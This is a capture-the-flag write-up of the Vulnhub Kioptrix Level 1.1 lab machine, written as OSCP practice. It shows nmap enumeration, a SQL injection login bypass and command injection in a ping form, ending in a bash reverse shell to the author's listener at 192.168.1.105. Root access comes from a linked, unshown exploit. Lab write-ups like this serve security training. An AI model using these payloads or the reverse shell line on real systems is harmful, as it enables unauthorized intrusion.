Kioptrix: Level 1.1 (#2)
This is my second write-up to solve kioptrix Machine level 1.1 (#2) form Vulnhub, as training for OSCP.
Description of Kioptrix VM Image Challenges:
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.
You can Download the Machine from here.
Network Scanning
Let’s go to get the IP of the vulnerable box by using netdiscover.
#sudo netdiscover -i eth0The Target IP is 192.168.1.107
Enumeration
let’s start scanning all ports and running services by using Nmap Tool
le0mx@LE0MX:~$ sudo nmap -A -O -sV 192.168.1.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020–12–27 05:22 CST
Nmap scan report for desktop-mf54b8n (192.168.1.107)
Host is up (0.00034s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2020–12–26T12:07:48+00:00; -23h15m28s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:0C:A9:EB (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9–2.6.30
Network Distance: 1 hopHost script results:
|_clock-skew: -23h15m28sTRACEROUTE
HOP RTT ADDRESS
1 0.34 ms desktop-mf54b8n (192.168.1.107)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.11 seconds
I found many ports are open like 22 SSH, 80 HTTP,443 HTTPS, 631, and 3306.
Let’s check the web page,
Okay, it’s a login page, I will check the source code,
Nothing interesting, let’s go back to the machine and try SQL Injection, I suppose the SQL line in the PHP file is
SELECT * FROM users WHERE username = ‘$username’ AND password=’$password’
let’s try with
administrator
' OR 'LE0MX'='LE0MXYeeees, it’s working and i found this page
mmmm,let’s write any IP like 8.8.8.8 and click submit,
Looks like I’ve seen that scene before in a CTF challenge, and I found it has vulnerability (command injection),
Let’s confirm that by writing this
8.8.8.8; ls
Yes, it’s working and I got a list of files in the directory (index.php, pingit.php)
Now let’s try to get a shell by netcat by write instead of 8.8.8.8
; bash -i >& /dev/tcp/192.168.1.105/5555 0>&1
And will listen by netcat on port 5555, and I Got the machine now but as a user
let’s check if this version has a Privilege escalation exploit by search on Exploit-db,
After the search, I found this Privilege escalation code (you can get it from here)
let’s use it, first, we will go to /var/www/html and will run this command
#sudo service apache2 start
Now I will go back to the machine and will run these commands
Yeeeeeeeeeeees, I have root permission now
